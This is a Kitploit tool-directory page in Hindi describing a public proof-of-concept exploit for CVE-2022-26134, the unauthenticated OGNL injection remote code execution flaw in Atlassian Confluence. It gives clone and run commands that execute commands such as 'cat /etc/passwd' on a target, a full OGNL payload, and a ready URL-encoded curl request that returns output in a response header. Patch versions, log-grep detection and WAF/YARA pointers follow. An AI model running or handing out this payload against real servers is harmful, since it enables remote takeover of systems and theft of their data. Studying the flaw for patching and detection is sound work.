Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2022-26134 — Atlassian Confluence (CVE-2022-26134) - अप्रमाणित OGNL इंजेक्शन भेद्यता (RCE)। | Kitploit
उपकरण/GitHubGitHub/debajyoti0-0/cve-2022-26134
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षापेलोड डेवलपमेंट
GitHubdebajyoti0-0/cve-2022-26134

CVE-2022-26134

Atlassian Confluence (CVE-2022-26134) - अप्रमाणित OGNL इंजेक्शन भेद्यता (RCE)।

रिपॉजिटरी देखें
3114 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2022-26134 - OGNL इंजेक्शन भेद्यता:

यह एक प्रूफ-ऑफ-कॉन्सेप्ट स्क्रिप्ट है जो Atlassian Confluence 7.18 और उससे निचले उत्पादों को प्रभावित करने वाली रिमोट कोड एक्ज़ीक्यूशन भेद्यता का शोषण करती है। OGNL इंजेक्शन भेद्यता एक अनधिकृत उपयोगकर्ता को Confluence Server या Data Center इंस्टेंस पर मनमाना कोड निष्पादित करने की अनुमति देती है।

प्रभावित संस्करण:

Confluence Server और Data Center के सभी समर्थित संस्करण प्रभावित हैं।
Confluence Server और Data Center के 1.3.0 के बाद और 7.18.1 से नीचे के संस्करण प्रभावित हैं।
इस भेद्यता का CVSS स्कोर गंभीरता के लिए 10 में से 10 है।

निर्भरताएँ:

  • Python 3.3+
  • निर्भरताएँ निम्न के माध्यम से पूरी की जा सकती हैं
root@kitploit:~
pip install -r requirements.txt

उपयोग कैसे करें:

रिपॉजिटरी क्लोन करें:

root@kitploit:~
git clone https://github.com/Nwqda/CVE-2022-26134
cd CVE-2022-26134

फिर आप अपनी पसंद के कमांड के साथ एक्सप्लॉइट को निम्नानुसार चला सकते हैं:

root@kitploit:~
python3 cve-2022-26134.py https://target.com "id"
python3 cve-2022-26134.py https://target.com "ps aux"
python3 cve-2022-26134.py https://target.com "cat /etc/passwd"

पेलोड:

root@kitploit:~
${(#[email protected]@toString(@java.lang.Runtime@getRuntime().exec("cat /etc/passwd").getInputStream(),"utf-8")).(@com.opensymphony.webwork.ServletActionContext@getResponse().setHeader("X-Cmd-Response",#a))}

CURL कमांड के साथ उदाहरण:

root@kitploit:~
curl --head -k "https://YOUR_TARGET.com/%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22cat%20%2Fetc%2Fpasswd%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D" 

फिर, कमांड का परिणाम रिस्पॉन्स हेडर में X-Cmd-Response पैरामीटर में प्रतिबिंबित होगा।

विक्रेताओं के शमन दिशानिर्देश:

Atlassian की आधिकारिक अनुशंसाओं का पालन करें:
https://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-1130377146.html

पैचिंग:

Atlassian ने इस CVE से प्रभावित अपने उत्पादों के लिए एक सलाह जारी की है, जिसे आप यहाँ पढ़ सकते हैं। समस्या को हल करने के लिए, आपको अपने Confluence संस्करण को अपग्रेड करना होगा। प्रकाशन के समय सुझाई गई सूची निम्न है:

  • 7.4.17
  • 7.13.7
  • 7.14.3
  • 7.15.2
  • 7.16.4
  • 7.17.4
  • 7.18.1

पहचान - लॉग फ़ाइलें:

Confluence एक Apache Tomcat सर्वर है जिसकी लॉगिंग /opt/atlassian/confluence/logs में स्थित होती है। आप कमांड निष्पादित करने के लिए Java runtime का उपयोग करने वाले पेलोड के HTTP GET अनुरोधों को खोजने के लिए grep जैसे कमांड का उपयोग कर सकते हैं। उदाहरण के लिए:

grep -R "/%24%7B%40java.lang.Runtime%40getRuntime%28%29.exec%28%22" catalina.out में

पता लगाने की क्षमताएँ:

यह भेद्यता सभी सेल्फ-होस्टेड इंस्टेंस को प्रभावित करती है। यदि आप WAF का उपयोग करते हैं, तो आप अंदर ${ वाले URL को ब्लॉक कर सकते हैं।

YARA (Volexity द्वारा): https://github.com/volexity/threat-intel/blob/main/2022/2022-06-02%20Active%20Exploitation%20Of%20Confluence%200-day/indicators/yara.yar

अतिरिक्त पठन सामग्री:

  • NIST राष्ट्रीय भेद्यता डेटाबेस प्रविष्टि (CVE-2022-26134)
  • Confluence RCE की तलाश [CVE-2022–26134]
  • Confluence RCE का अन्वेषण और निवारण
  • OGNL इंजेक्शन क्या है?
  • Citrix: अनधिकृत OGNL इंजेक्शन RCE को कम करने के लिए मार्गदर्शन
  • Apache Struts में OGNL इंजेक्शन की खोज

नोट:

केवल शैक्षिक उद्देश्य के लिए।

CVE-2022-26134 meme fire

टूल डाउनलोड करें